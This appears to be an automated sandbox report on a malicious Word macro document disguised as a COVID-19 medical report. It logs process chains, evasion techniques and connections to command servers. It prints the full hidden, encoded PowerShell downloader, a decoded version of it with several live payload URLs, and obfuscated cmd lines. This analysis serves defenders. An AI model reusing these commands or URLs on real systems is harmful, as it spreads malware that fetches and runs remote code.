Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACw
AWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: IU-8549 Medical report COVID-19.doc Initial sample: OLE summary subject = Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: IU-8549 Medical report COVID-19.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Document contains an embedded VBA with many randomly named variables
Source: IU-8549 Medical report COVID-19.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: IU-8549 Medical report COVID-19.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior
PE file contains an invalid checksum
Source: E6_R.dll.5.dr Static PE information: real checksum: 0x5c618 should be: 0x5db58
PE file contains sections with non-standard names
Source: E6_R.dll.5.dr Static PE information: section name: .text4
Source: E6_R.dll.5.dr Static PE information: section name: .text8
Source: E6_R.dll.5.dr Static PE information: section name: .text7
Source: E6_R.dll.5.dr Static PE information: section name: .text6
Source: E6_R.dll.5.dr Static PE information: section name: .text5
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022FED0 push edx; ret 7_2_0022FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00211155 push ecx; ret 7_2_00211156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002121EC pushad ; ret 7_2_00212200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00213391 push eax; iretd 7_2_002133AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00210C18 pushfd ; retf 7_2_00210C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002117A1 push ds; iretd 7_2_002117A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0028FED0 push edx; ret 8_2_0028FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00271155 push ecx; ret 8_2_00271156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002721EC pushad ; ret 8_2_00272200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00273391 push eax; iretd 8_2_002733AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00270C18 pushfd ; retf 8_2_00270C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002717A1 push ds; iretd 8_2_002717A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0014FED0 push edx; ret 9_2_0014FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00131155 push ecx; ret 9_2_00131156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001321EC pushad ; ret 9_2_00132200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00133391 push eax; iretd 9_2_001333AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00130C18 pushfd ; retf 9_2_00130C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001317A1 push ds; iretd 9_2_001317A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019FED0 push edx; ret 10_2_0019FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00181155 push ecx; ret 10_2_00181156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001821EC pushad ; ret 10_2_00182200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00183391 push eax; iretd 10_2_001833AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00180C18 pushfd ; retf 10_2_00180C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001817A1 push ds; iretd 10_2_001817A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CFED0 push edx; ret 11_2_001CFFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B1155 push ecx; ret 11_2_001B1156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B21EC pushad ; ret 11_2_001B2200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B3391 push eax; iretd 11_2_001B33AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B0C18 pushfd ; retf 11_2_001B0C19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B17A1 push ds; iretd 11_2_001B17A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0011FED0 push edx; ret 12_2_0011FFD4

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Dgmlr\ngcj.eda

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Dgmlr\ngcj.eda:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000008.00000002.2121274122.000000000031D000.00000004.00000020.sdmp Binary or memory string: PPTP00VMware_S
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h] 7_2_1000A823
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 115.21.224.117 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 195.159.28.230 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 162.241.204.233 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.38.130.14 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
